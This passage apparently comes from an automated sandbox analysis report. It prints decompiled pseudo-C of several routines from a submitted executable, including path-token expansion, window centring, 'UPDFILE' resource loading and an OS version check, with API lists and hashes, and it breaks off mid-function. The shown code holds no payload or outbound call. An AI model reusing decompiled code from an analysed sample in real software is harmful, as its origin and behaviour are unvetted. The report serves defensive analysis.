                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0309ea1e9407d320f6918030b4a23e74fc556a33b70204c2c4151082bdba0a60
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A01B131241129ABCB1A5F69EC0C9AE3B66FB15700F204313F947D67A0CB398F41CB8A
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E008D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x8d9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E008D1680(_t65, E008D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E008D65E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E008D1680(_t65, E008D17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x008d2aac
                                                                                                                                                                                                                                            0x008d2ab7
                                                                                                                                                                                                                                            0x008d2abc
                                                                                                                                                                                                                                            0x008d2abe
                                                                                                                                                                                                                                            0x008d2ac3
                                                                                                                                                                                                                                            0x008d2ac6
                                                                                                                                                                                                                                            0x008d2ac9
                                                                                                                                                                                                                                            0x008d2ace
                                                                                                                                                                                                                                            0x008d2ae6
                                                                                                                                                                                                                                            0x008d2bdc
                                                                                                                                                                                                                                            0x008d2bdc
                                                                                                                                                                                                                                            0x008d2be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2af2
                                                                                                                                                                                                                                            0x008d2afc
                                                                                                                                                                                                                                            0x008d2b00
                                                                                                                                                                                                                                            0x008d2b05
                                                                                                                                                                                                                                            0x008d2b05
                                                                                                                                                                                                                                            0x008d2b0b
                                                                                                                                                                                                                                            0x008d2bca
                                                                                                                                                                                                                                            0x008d2bd1
                                                                                                                                                                                                                                            0x008d2b11
                                                                                                                                                                                                                                            0x008d2b18
                                                                                                                                                                                                                                            0x008d2b26
                                                                                                                                                                                                                                            0x008d2b99
                                                                                                                                                                                                                                            0x008d2bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2b9b
                                                                                                                                                                                                                                            0x008d2bae
                                                                                                                                                                                                                                            0x008d2bb3
                                                                                                                                                                                                                                            0x008d2bb5
                                                                                                                                                                                                                                            0x008d2bb5
                                                                                                                                                                                                                                            0x008d2bb8
                                                                                                                                                                                                                                            0x008d2bb8
                                                                                                                                                                                                                                            0x008d2bba
                                                                                                                                                                                                                                            0x008d2bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2bb8
                                                                                                                                                                                                                                            0x008d2b28
                                                                                                                                                                                                                                            0x008d2b2e
                                                                                                                                                                                                                                            0x008d2b33
                                                                                                                                                                                                                                            0x008d2b39
                                                                                                                                                                                                                                            0x008d2b3c
                                                                                                                                                                                                                                            0x008d2b3c
                                                                                                                                                                                                                                            0x008d2b3e
                                                                                                                                                                                                                                            0x008d2b3f
                                                                                                                                                                                                                                            0x008d2b55
                                                                                                                                                                                                                                            0x008d2b5d
                                                                                                                                                                                                                                            0x008d2b64
                                                                                                                                                                                                                                            0x008d2b64
                                                                                                                                                                                                                                            0x008d2b7a
                                                                                                                                                                                                                                            0x008d2b7f
                                                                                                                                                                                                                                            0x008d2b81
                                                                                                                                                                                                                                            0x008d2b81
                                                                                                                                                                                                                                            0x008d2b84
                                                                                                                                                                                                                                            0x008d2b84
                                                                                                                                                                                                                                            0x008d2b86
                                                                                                                                                                                                                                            0x008d2b87
                                                                                                                                                                                                                                            0x008d2bbf
                                                                                                                                                                                                                                            0x008d2bc1
                                                                                                                                                                                                                                            0x008d2bc1
                                                                                                                                                                                                                                            0x008d2b26
                                                                                                                                                                                                                                            0x008d2bda
                                                                                                                                                                                                                                            0x008d2bda
                                                                                                                                                                                                                                            0x008d2be6
                                                                                                                                                                                                                                            0x008d2be6
                                                                                                                                                                                                                                            0x008d2bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 008D2AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 008D2AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 008D2B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 008D2B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 008D2B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 008D2BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: ebb49849cd702ef6a1aeea4c99112f93038c5761052266a94b2b2658dc97bcb7
                                                                                                                                                                                                                                            • Instruction ID: 71f70270d83ff9ae7573965cb89e5207ad5fffe36b118d83f75e6be9ec86c341
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebb49849cd702ef6a1aeea4c99112f93038c5761052266a94b2b2658dc97bcb7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F41E1346042459EDF199F349C54AFD7BA9FF66320F14029BE8C2D7302DBB58E868B61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E008D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E008D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x008d43d0
                                                                                                                                                                                                                                            0x008d43d8
                                                                                                                                                                                                                                            0x008d43df
                                                                                                                                                                                                                                            0x008d43e6
                                                                                                                                                                                                                                            0x008d43ec
                                                                                                                                                                                                                                            0x008d43f1
                                                                                                                                                                                                                                            0x008d4400
                                                                                                                                                                                                                                            0x008d4403
                                                                                                                                                                                                                                            0x008d440b
                                                                                                                                                                                                                                            0x008d4420
                                                                                                                                                                                                                                            0x008d4429
                                                                                                                                                                                                                                            0x008d4437
                                                                                                                                                                                                                                            0x008d4444
                                                                                                                                                                                                                                            0x008d4447
                                                                                                                                                                                                                                            0x008d444d
                                                                                                                                                                                                                                            0x008d4454
                                                                                                                                                                                                                                            0x008d445b
                                                                                                                                                                                                                                            0x008d4460
                                                                                                                                                                                                                                            0x008d4461
                                                                                                                                                                                                                                            0x008d4467
                                                                                                                                                                                                                                            0x008d446f
                                                                                                                                                                                                                                            0x008d4473
                                                                                                                                                                                                                                            0x008d4473
                                                                                                                                                                                                                                            0x008d4463
                                                                                                                                                                                                                                            0x008d4463
                                                                                                                                                                                                                                            0x008d4463
                                                                                                                                                                                                                                            0x008d447a
                                                                                                                                                                                                                                            0x008d4481
                                                                                                                                                                                                                                            0x008d4484
                                                                                                                                                                                                                                            0x008d448a
                                                                                                                                                                                                                                            0x008d4492
                                                                                                                                                                                                                                            0x008d4496
                                                                                                                                                                                                                                            0x008d4496
                                                                                                                                                                                                                                            0x008d4486
                                                                                                                                                                                                                                            0x008d4486
                                                                                                                                                                                                                                            0x008d4486
                                                                                                                                                                                                                                            0x008d44b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008D43F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008D440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 008D4423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 008D442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 008D443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 008D4447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008D44A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 2a5a810141d83dbdc3fd78594638732863c95b92f4584bbf3f2acbc7ef154304
                                                                                                                                                                                                                                            • Instruction ID: 8aa4a6effc2be3de9081d580db226c4f0f924520067d85bbcfb5d47034db7cec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5a810141d83dbdc3fd78594638732863c95b92f4584bbf3f2acbc7ef154304
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32311E32E01119AFCF14CFB8DD499EEBBB6FB89310F25426AE805F3250DA306D458B64
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E008D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E008D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0x8d9124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0x8da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E008D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E008D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x008d6298
                                                                                                                                                                                                                                            0x008d62a0
                                                                                                                                                                                                                                            0x008d62a7
                                                                                                                                                                                                                                            0x008d62ad
                                                                                                                                                                                                                                            0x008d62af
                                                                                                                                                                                                                                            0x008d62bb
                                                                                                                                                                                                                                            0x008d62c3
                                                                                                                                                                                                                                            0x008d62c4
                                                                                                                                                                                                                                            0x008d633b
                                                                                                                                                                                                                                            0x008d633b
                                                                                                                                                                                                                                            0x008d6345
                                                                                                                                                                                                                                            0x008d634d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d62da
                                                                                                                                                                                                                                            0x008d62de
                                                                                                                                                                                                                                            0x008d635f
                                                                                                                                                                                                                                            0x008d6369
                                                                                                                                                                                                                                            0x008d62e0
                                                                                                                                                                                                                                            0x008d62e0
                                                                                                                                                                                                                                            0x008d62e0
                                                                                                                                                                                                                                            0x008d62e3
                                                                                                                                                                                                                                            0x008d62e5
                                                                                                                                                                                                                                            0x008d62e5
                                                                                                                                                                                                                                            0x008d62e8
                                                                                                                                                                                                                                            0x008d62e8
                                                                                                                                                                                                                                            0x008d62ea
                                                                                                                                                                                                                                            0x008d62eb
                                                                                                                                                                                                                                            0x008d62ef
                                                                                                                                                                                                                                            0x008d62f1
                                                                                                                                                                                                                                            0x008d62f3
                                                                                                                                                                                                                                            0x008d6302
                                                                                                                                                                                                                                            0x008d6308
                                                                                                                                                                                                                                            0x008d630d
                                                                                                                                                                                                                                            0x008d6314
                                                                                                                                                                                                                                            0x008d6314
                                                                                                                                                                                                                                            0x008d6316
                                                                                                                                                                                                                                            0x008d6319
                                                                                                                                                                                                                                            0x008d6355
                                                                                                                                                                                                                                            0x008d6357
                                                                                                                                                                                                                                            0x008d631b
                                                                                                                                                                                                                                            0x008d631b
                                                                                                                                                                                                                                            0x008d6331
                                                                                                                                                                                                                                            0x008d6334
                                                                                                                                                                                                                                            0x008d6339
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6339
                                                                                                                                                                                                                                            0x008d6319
                                                                                                                                                                                                                                            0x008d636b
                                                                                                                                                                                                                                            0x008d637d
                                                                                                                                                                                                                                            0x008d637d
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D171E: _vsnprintf.MSVCRT ref: 008D1750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D62CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D62D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 008D6345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008D51CA,00000004,00000024,008D2F71,?,00000002,00000000), ref: 008D6357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: bab955da73bebc3dee24d9b55b8478ff3a6929e58b3c4d02182582290ebd5bed
                                                                                                                                                                                                                                            • Instruction ID: e94a4b674f6c16f15506993ead7ff898b08622066e86ad8ff7d771af946969fa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bab955da73bebc3dee24d9b55b8478ff3a6929e58b3c4d02182582290ebd5bed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5521B675A0121DABDB189F649C499BEBB78FF44714B10031BE902E3341EB359D158BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E008D681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0x8d81d8; // 0x0
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0x8d81d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0x8d81d8; // 0x0
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
